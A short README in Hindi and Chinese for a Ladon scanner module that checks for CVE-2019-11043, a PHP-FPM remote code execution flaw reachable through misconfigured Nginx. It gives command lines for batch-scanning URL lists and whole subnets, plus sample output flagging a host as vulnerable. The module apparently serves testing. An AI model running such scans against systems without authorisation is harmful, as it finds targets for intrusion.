
CVE-2019-11043 (PHP-FPM रिमोट कोड निष्पादन) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट मॉड्यूल, जिसमें कमजोर Nginx कॉन्फ़िगरेशन के लिए बैच स्कैनिंग क्षमताएँ शामिल हैं।
PHP-FPM दूरस्थ कोड निष्पादन भेद्यता (CVE-2019-11043)
चांगटिंग टेक्नोलॉजी द्वारा आयोजित Real World CTF में, एक विदेशी सुरक्षा शोधकर्ता एंड्रयू डैनाउ को एक CTF समस्या हल करते समय पता चला कि जब लक्ष्य सर्वर URL पर %0a प्रतीक भेजा गया, तो सेवा ने असामान्य प्रतिक्रिया दी, संदेह है कि एक भेद्यता मौजूद है।
गलत Nginx कॉन्फ़िगरेशन का उपयोग करने के मामले में, दुर्भावनापूर्ण रूप से तैयार किए गए पैकेट के माध्यम से, PHP-FPM को मनमाना कोड निष्पादित करने दिया जा सकता है।
Ladon.exe को उसी निर्देशिका में रखें, फिर C-सेगमेंट या url.txt पर बैच जांच कर सकते हैं।
Ladon CVE-2019-11043_Poc.ini 批量URL检测(根目录下放url.txt)
Ladon 192.168.1.37/24 CVE-2019-11043_Poc.ini 批量检测C段主机是否存在该漏洞
Ladon http://192.168.1.37:8080/index.php CVE-2019-11043_Poc.ini 指定URL
Ladon 5.5
By K8gege
Call AnyExe/Command
http://192.168.1.37:8080/index.php
load F:\Python279\python.exe
ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php